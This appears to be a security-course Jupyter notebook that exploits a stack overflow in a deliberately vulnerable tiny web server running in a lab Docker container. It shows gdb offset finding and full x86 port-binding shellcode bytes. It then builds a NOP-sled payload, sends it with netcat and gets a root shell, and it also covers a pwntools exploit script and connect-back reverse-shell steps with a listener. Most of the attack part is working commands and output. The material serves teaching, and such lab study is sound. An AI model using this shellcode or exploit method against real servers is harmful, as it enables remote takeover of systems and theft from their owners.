# A Tiny Web Server & Its Exploitation

- similar to simple server but uses HTTP protocol to communicate; hence called Web Server
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled `webroot` and sends it to the client/browser
- if the file/resource is not found, the server responds with 404 HTTP (`File Not Found`) error in response
- a tiny web server that serves static html webpage
- see `demos/server/tinyweb`

In [1]:
# check the working directory
%pwd

'/home/kali/projects/SoftwareSecurity/notebooks'

In [2]:
%cd ../demos/server/tinyweb

/home/kali/projects/SoftwareSecurity/demos/server/tinyweb


In [3]:
# list files and folders from current working directory
! ls

buffer		     exploit.py		main.o			 tinyweb.exe
core.26		     junk.txt		Makefile		 util
docker-compose.yaml  local_exploit.bin	port_bind_exploit.bin	 webroot
Dockerfile	     main.cpp		port_bind_shellcode.bin


In [4]:
! cat main.cpp

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "./util/utility.h"
#include "./util/net_utility.h"

enum REQUEST_TYPE {GET, POST, HEAD, UNKNOWN};

using namespace std;

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor
void send_file_not_found(const int); // send file not found error
void send_file(const int, char *); // send file/resource requested
void send_buffer_address(const int, char *); // send buffer address

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

  

In [ ]:
! cat util/net_utility.h

In [ ]:
! cat webroot/index.html

In [ ]:
! cat ./util/net_utility.h

In [ ]:
! cat Makefile

In [ ]:
! cat ./util/utility.h

### Build and run Server Docker image

- NOTE - don't build the tinyweb server in the Docker; disabling -fno-stack-protector is not working!
- use provided `docker-compose` file that uses `Dockerfile` to build and run the image
- compile tiny web server and run it using Makefile from Docker Terminal
- access the IP address using the host browser
- observe the log on the server

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker-compose up --build -d

┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker container ls         
CONTAINER ID   IMAGE            COMMAND                  CREATED             STATUS             PORTS                               NAMES
cc1590ca3f63   tinyweb_server   "sh -c 'echo 0 > /pr…"   About an hour ago   Up About an hour   0.0.0.0:80->80/tcp, :::80->80/tcp   tinyweb

┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker exec -it tinyweb bash
root@tinyweb:/var/www# 

┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ docker exec -it tinyweb bash
root@tinyweb:/var/www# ifconfig | grep inet
        inet 192.168.16.2  netmask 255.255.240.0  broadcast 192.168.31.255
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>

root@tinyweb:/var/www# make
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 main.cpp
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o tinyweb.exe *.o
chown root:root tinyweb.exe
chmod u+s tinyweb.exe
./tinyweb.exe
Accepting web requests on port 80
Got request from 192.168.16.1:44262 "GET / HTTP/1.1"
Received: 14 bytes
        Opening './webroot/index.html'   200 OK
Got request from 192.168.16.1:44270 "GET /image.jpg HTTP/1.1"
Received: 23 bytes
        Opening './webroot/image.jpg'    200 OK
Got request from 192.168.16.1:44286 "GET /image.jpg"
Received: 0 bytes
 NOT HTTP!
 
 
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ wget 192.168.16.2
--2025-04-06 00:15:09--  http://192.168.16.2/
Connecting to 192.168.16.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: ‘index.html.1’

index.html.1                     [ <=>                                        ]     401  --.-KB/s    in 0s      

2025-04-06 00:15:09 (42.6 MB/s) - ‘index.html.1’ saved [401]

```

### Server Stackoverflow Vulnerability & Exploitation

- same concept as the previous stackoverflow vulnerability & exploitation
- only difference is that the input data to buffer is coming from remote client via TCP/IP
- server has stack overflow vulnerability in `recvline(...)` of `util/net_utility.h` file

#### Crash Tinyweb server

- use a different VM or a machine (attacker machine)
- generate a junk data of 1000 bytes and send it to the server
- Web server's including Tinyweb server users `\r\n` as a delimeter to end the request string

In [ ]:
! python -c 'print("A"*1000, end="\r\n")' > junk.txt

In [ ]:
! hexdump -C junk.txt

In [ ]:
# count the number of bytes
! wc -c junk.txt

### send junk
- replace tinyserver ip and port
- send the junk from different VM or system

#### attacker machine

```bash
$ cat junk.txt | nc -v [tinyseverip] [port]
```

#### tiny webserver target

root@tinyweb:/var/www# make run
./tinyweb.exe
Accepting web requests on port 80
Request buffer @ 0xffffd400
Got request from 192.168.144.1:50322 "GET /buffer HTTP/1.1"
Received: 20 bytes
 200 OK
ls
^HRequest buffer @ 0xffffd400
make: *** [Makefile:29: run] Segmentation fault (core dumped)

```

## Pawn the Docker running Tinyweb server

- find the overflow vulnerability
- find the return address and offset from `request` buffer
    - this will give us the length of the payload we need to build

### Using GDB on a running process

- download the opensource/binary and run it locally
- run the tinyweb.exe and get its process id to attach it to the gdb

```bash
┌──(kali㉿K)-[~/projects/SoftwareSecurity/demos/server/tinyweb]
└─$ ps aux | grep tinyweb             
root       12385  0.0  0.0   2452   520 pts/3    S+   13:33   0:00 ./tinyweb.exe
kali       12398  0.0  0.0   6184   708 pts/4    S+   13:34   0:00 grep --color=auto tinyweb
```

- Attach gdb to the tinyweb server

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```bash
┌──(kali㉿K)-[~/projects/SoftwareSecurity/demos/server/tinyweb]
└─$ sudo gdb -q --pid=12385 --symbols=./tinyweb.exe
[sudo] password for kali: 
Reading symbols from ./tinyweb.exe...
Attaching to process 12385
Load new symbol table from "/home/kali/projects/NetworkSecurity/demos/tinyweb/tinyweb.exe"? (y or n) ycreate
Reading symbols from /home/kali/projects/NetworkSecurity/demos/tinyweb/tinyweb.exe...
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
--Type <RET> for more, q to quit, c to continue without paging--c
0xf7fd0559 in __kernel_vsyscall ()  

(gdb) list main # list 10 lines around main
20      void handle_connection(int, struct sockaddr_in *); // handle web requests
21      int get_file_size(int); // returns the filesize of open file descriptor
22      void send_file_not_found(const int); // send file not found error
23      void send_file(const int, char *); // send file/resource requested
24
25      int main(void) {
26         int sockfd, new_sockfd, yes=1; 
27         struct sockaddr_in host_addr, client_addr;   // my address information
28         socklen_t sin_size;
29
(gdb)
(gdb) list 75 # list 10 lines around line #75
70              // receive one line from client and store it into request buffer
71              length = recv_line(sockfd, request);
72
73              printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
74
75              ptr = strstr(request, " HTTP/"); // search for valid looking request
76              if(ptr == NULL) { // then this isn't valid HTTP
77                      printf(" NOT HTTP!\n");
78              } 
79              else {                                                                     

$ break 71 # break at recv_line function that has overrun issue

$ continue # make a get request using a terminal or browser to hit the breakpoint
$ print request
$ print /x &request # Note the address of request variable
$1 = (char (*)[500]) 0xffffb770
(gdb) 


$ x/16wx request+500 # examine 16 words at request+500 bytes in stack - return address must be definitely 500 bytes away from request!
(gdb) x /16wx request+500
0xffffb964:     0x00000000      0x00000003      0x2ddeb000      0x0804cff4
0xffffb974:     0x0804cff4      0xffffba78      **0x08049a77**      0x00000004
0xffffb984:     0xffffb994      0xffffb990      0x0804977c      0x00000010
0xffffb994:     0x06dd0002      0x0100007f      0x00000000      0x00000000

(gdb) bt # find the return address to main
#0  handle_connection (sockfd=4, client_addr_ptr=0xffffb994) at main.cpp:71
#1  0x08049a77 in main () at main.cpp:55

# return address to main is also stored at $ebp+4 
(gdb) x/x $ebp+4
0xffffb97c:     0x08049a77

# OFFSET to return address
$ p /u <location of return address> - <request address> 
(gdb) p /u 0xffffb97c - 0xffffb770
$2 = 524

# find the address of about 100 bytes from the base of request (controlled return address)
(gdb) p /x request+100
$3 = 0xffffb7d4
```

- exit the debugger and rerun the server on the same terminal

### Remote Exploit

- local exploit is not practical in real-world, why?
- let's create a port binding shellcode so the attacker can remotely login to the victim once pwned
- use a different VM or system as an attacker machine
- create Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- write the binary shellcode to a file
- add about 100 bytes to the beginning address of `request` buffer to get the working landing address

### Generate port binding shellcode

- make sure to provide IP of the target/victim system and available ports above 1024
- gdb-peda$ shellcode generate x86/linux bindport <port> <ip>
- find victim's IP address
- pick a port, e.g. 9999 # that's unlikely in use by the Tinyweb server
- find the IP of tinyweb server to generate the shellcode
- e.g., 192.168.144.2 is the IP of my Docker running the tinweb server
    
```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/server/tinyweb]
└─$ ifconfig        
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.47.130  netmask 255.255.255.0  broadcast 192.168.47.255
        inet6 fe80::ed5d:b4c2:d275:17ca  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8a:20:62  txqueuelen 1000  (Ethernet)
        RX packets 47707  bytes 68315780 (65.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4863  bytes 456804 (446.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(kali㉿K)-[~]
└─$ gdb -q           
gdb-peda$ shellcode generate
Available shellcodes:                                                                          
    x86/linux exec                                                                           
    x86/linux bindport                                                                       
    x86/linux connect                                                                       
    x86/bsd exec                                                                             
    x86/bsd bindport
    x86/bsd connect


gdb-peda$ shellcode generate x86/linux bindport 9999 192.168.144.2
# x86/linux/bindport: 84 bytes
# port=9999, host=192.168.144.2
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)

gdb-peda$ quit
```

In [ ]:
! pwd

In [ ]:
# FIXME: update your binary shellcode from PEDA...
# x86/linux/bindport: 84 bytes
# port=9999, host=192.168.144.2
shellcode = (
    b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    b"\x43\x52\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    b"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    b"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    b"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    b"\x89\xe1\xcd\x80"
)


#FIXME: provide abs or relative path/file_name of the binary file to create
fileName = "port_bind_shellcode.bin"

# open and write binary to the file

with open(fileName, 'wb') as fout:
	fout.write(shellcode)

print(f'All done! Binary file created: {fileName}') 

In [ ]:
! hexdump -C port_bind_shellcode.bin

### Use Python script to create binary shellcode file

- alternatively, a Python script `shellcode_writer.py`is provided in shellcode folder to simplify generating binary shellcode file 
- can simply copy paste shellcode generated by PEDA and update the filename
- the program when run will generate the binary file with shellcode

In [ ]:
! wc -c port_bind_shellcode.bin

In [ ]:
# lets create the exploit code to send to the server
# find the size of the NOP sled; repeat the buffer address 50 times
528-84-(50*4)

In [ ]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*244)' > port_bind_exploit.bin

In [ ]:
# let's append the shellcode
! cat port_bind_shellcode.bin >> port_bind_exploit.bin

In [ ]:
# can't have 00 in the address
! python -c 'print(hex(0xffffd400+120))'

In [ ]:
# let's write the repeated return address: 0xffffc144
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x78\xd4\xff\xff"*50)' >> port_bind_exploit.bin

In [ ]:
! wc -c port_bind_exploit.bin

In [ ]:
# let's append the end of request delimeter \r\n
! python3 -c 'import sys; sys.stdout.buffer.write(b"\r\n")' >> port_bind_exploit.bin

In [ ]:
! wc -c port_bind_exploit.bin

In [ ]:
! hexdump -C port_bind_exploit.bin

### Expolit the Tinyweb Server
- rerun the Tinyweb server on the target machine
- send `port_bind_exploit.bin` from a different VM to the target machine
    - this mimics the real-world server exploitation 
- use netcat as demonstrated in the local exploit above

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity]
└─$ cat port_bind_exploit.bin | nc -v <192.168.142.2> 80 
```

- Tinyweb when exploited will run the port binding shellcode at port 9999 as shown below

```bash
root@tinyweb:/var/www# make run
./tinyweb.exe
Accepting web requests on port 80
Request buffer @ 0xffffd400
Got request from 192.168.144.1:33034 "GET /buffer HTTP/1.1"
Received: 20 bytes
 200 OK
Request buffer @ 0xffffd400
Got request from 192.168.144.1:55104 "����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�SCSjjfX����CRfh'fS��jfXPQV���f��RRVC���f�jY�?Iy��
                                                                           Rh//shh/bin��RS��x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���x���"
Received: 528 bytes
 NOT HTTP!
```

- use another terminal from the attcker machine to netcat to port 9999
- once connected, you'll not see the prompt `$` `or `#`, but you can still issue commands on the pwned target

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/server/tinyweb]
└─$ nc 192.168.144.2 9999          
ls
Dockerfile
Makefile
buffer
core.26
docker-compose.yaml
exploit.py
junk.txt
local_exploit.bin
main.cpp
main.o
port_bind_exploit.bin
port_bind_shellcode.bin
tinyweb.exe
util
webroot
whoami
root

```

## Exploit using Pwntools

- Pwntools library helps us automate most of the steps using a Python script
- let's use pwntools to exploit the remote tinyweb server
- running pwntools interactively from Jupyter Notebook doesn't seem to work; connection autoshuts down
- open `demos/tinyweb/exploit.py` file
- fix all the FIXMEs and run it to exploit the target

In [ ]:
# it famils from conda environment!!!!! Not sure why.....
from pwn import *

In [ ]:
# create a socket connection to target
io = connect('192.168.144.2', 80)

In [ ]:
# send some data..
io.send(b'hello \r\n')

In [ ]:
# tinyweb exploit code in Python
! cat exploit.py

- run the exploit code from its directory

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ python3 exploit.py
[+] Opening connection to 192.168.195.167 on port 80: Done
sled len = 244
Target 192.168.195.167 exploited... connecting to port: 9999
[+] Opening connection to 192.168.195.167 on port 9999: Done
[*] Switching to interactive mode
$ whoami
user
$ ls
Makefile
junk.txt
local_exploit.bin
main.cpp
main.o
port_bind_exploit.bin
tinyweb.exe
webroot
$ exit
[*] Got EOF while reading in interactive
$ 
$ 
[*] Closed connection to 192.168.195.167 port 9999
[*] Got EOF while sending in interactive
[*] Closed connection to 192.168.195.167 port 80
```

## Remote Exploit - Connect-back Shellcode
- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- however, outgoing connection is typically allowed
- use the following exploit
- use a different VM or system as an attacker machine
- create connect back (TCP Reverse connect) shellcode
- generate Shellcode using GDB PEDA
    - IP address must be the address of the attacker for victim to connect back
    - Port can be any available higer port > 1024 on the attacker machine for victim to connect back to
- add about 100 bytes to the beginning address of request to get the working landing address


```bash
$ gdb -q
gdb-peda$ shellcode generate x86/linux connect <attacker_port> <attacker_ip>

```

- write shellcode to a file as binary one line at a time
- do one line at a time as following or use shellcode_writer.py script in shellcode folder

```bash
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line1")' > reverse_tcp.bin
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line2")' >> reverse_tcp.bin
...
...
```

- calculate `n` and `m` to make exploit code
    - `[<NOP sled>*n + len(reverse_tcp.bin) + <return address>*m]`
- repeated return address = `<address of request> + 100`
- run a server on attacker machine so the victim can connect back to it
- port must be the same as used in the exploit code

```bash
$ nc -v -l -p <attacker_port>
```

- create the exploit code (connect_back_exploit_code.bin) as demonstrated in local exploit
- send the expploit code to the Tinyweb server using netcat

```bash
$ cat connect_back_exploit_code.bin | nc -v <target ip> 80
```
- check the terminal running the netcat server on the attacker machine to verify if the victim is exploited and connected back to the attacker 
- interact with the victim